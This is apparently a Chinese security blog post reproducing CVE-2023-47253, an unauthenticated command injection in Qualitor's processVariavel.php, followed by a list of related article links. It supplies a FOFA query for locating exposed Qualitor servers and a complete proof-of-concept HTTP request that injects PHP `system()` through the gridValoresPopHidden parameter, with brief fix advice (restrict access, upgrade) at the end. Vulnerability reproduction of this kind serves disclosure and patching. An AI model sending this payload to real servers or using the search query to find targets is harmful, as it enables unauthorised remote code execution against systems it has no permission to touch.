Qualitor processVariavel.php 未授权命令注入漏洞复现(CVE-2023-47253)

0x01 漏洞概述

Qualitor 8.20及之前版本存在命令注入漏洞,远程攻击者可利用该漏洞通过PHP代码执行任意代码。

0x02 复现环境

FOFA:app="Qualitor-Web"

0x03 漏洞复现

PoC

GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("dir"); HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

0x04 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
妙哉7361 分钟前
零基础学安全--云技术基础
安全
zl.rs19 分钟前
对比C++,Rust在内存安全上做的努力
c++·安全·rust
网络研究院19 分钟前
远程视频验证如何改变商业安全
安全·视频·远程·验证·商业
ZHOU西口25 分钟前
MySQL系列之远程管理(安全)
数据库·mysql·安全·tls·加密连接·require_secure
白初&41 分钟前
权限的相关内容
web安全
云卓SKYDROID1 小时前
无人机飞行姿态详解!
科技·安全·无人机·云卓科技·飞行姿态
妙哉7361 小时前
零基础学安全--HTML
前端·安全·html
知白守黑V1 小时前
从ChatGPT到代理AI:安全领域的新变革
人工智能·安全·生成对抗网络·网络安全·chatgpt·安全威胁分析·ai数据安全
群联云防护小杜2 小时前
为什么DDoS防御很贵?
网络·网络协议·web安全·ddos
亿格云安全Lab2 小时前
换号后网盘未解绑?数据安全新隐患!
安全·网络安全·数据安全·企业安全